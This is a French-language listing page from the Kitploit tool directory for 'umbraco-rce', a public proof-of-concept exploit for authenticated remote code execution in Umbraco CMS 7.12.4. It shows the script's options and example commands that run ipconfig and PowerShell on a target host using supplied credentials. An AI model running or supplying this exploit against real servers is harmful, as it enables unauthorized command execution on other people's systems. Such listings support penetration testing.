Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/noraj/umbraco-rce
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubnoraj/umbraco-rce

Umbraco-RCE

Umbraco CMS 7.12.4 - (Authentifié) Exécution de code à distance

Voir le dépôt
7940il y a 5 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Site web

Exploit / PoC RCE pour Umbraco

Umbraco CMS 7.12.4 - Exécution de code à distance (authentifié)

[EDB-49488] [PacketStorm] [WLB-2020080012]

Utilisation

root@kitploit:~
$ python exploit.py -h
usage: exploit.py [-h] -u USER -p PASS -i URL -c CMD [-a ARGS]

Umbraco authenticated RCE

optional arguments:
  -h, --help                 show this help message and exit
  -u USER, --user USER       username / email
  -p PASS, --password PASS   password
  -i URL, --host URL         root URL
  -c CMD, --command CMD      command
  -a ARGS, --arguments ARGS  arguments

Exemples :

root@kitploit:~
$ python exploit.py -u [email protected] -p password123 -i 'http://10.0.0.1' -c ipconfig
$ python exploit.py -u [email protected] -p password123 -i 'http://10.0.0.1' -c powershell.exe -a '-NoProfile -Command ls'

Prérequis

  • Beautiful Soup
  • Requests

Exemple pour ArchLinux :

root@kitploit:~
pacman -S python-beautifulsoup4 python-requests

Exemple avec pip :

root@kitploit:~
pip3 install -r requirements.txt

Référence

Il s'agit d'une meilleure réécriture de EDB-ID-46153 utilisant des arguments (au lieu de valeurs codées en dur) et avec affichage sur stdout.

Testé avec python 3.8.

Télécharger l’outil